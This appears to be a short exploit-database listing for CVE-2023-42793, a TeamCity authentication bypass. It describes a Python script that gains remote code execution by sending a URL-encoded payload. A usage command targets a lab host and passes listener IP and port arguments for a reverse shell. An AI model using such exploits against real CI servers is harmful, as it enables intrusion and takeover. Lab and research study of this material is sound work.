Exploit for Authentication Bypass Using an Alternate Path or Channel in Jetbrains Teamcity CVE-2023-42793

Name: Exploit for Authentication Bypass Using an Alternate Path or Channel in Jetbrains Teamcity CVE-2023-42793
Rating: 5 (165 reviews)

2024-07-05 | CVSS 9.8

## https://sploitus.com/exploit?id=88326A44-1093-5883-B017-2769ECF67093
# About CVE-2023-42793

You will need to obtain the token first through using different exploit. However, the following exploit will allow you to obtain RCE into the Linux server as it encoded the payload in URL and sends it to the server.

# How to use

```bash
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT
```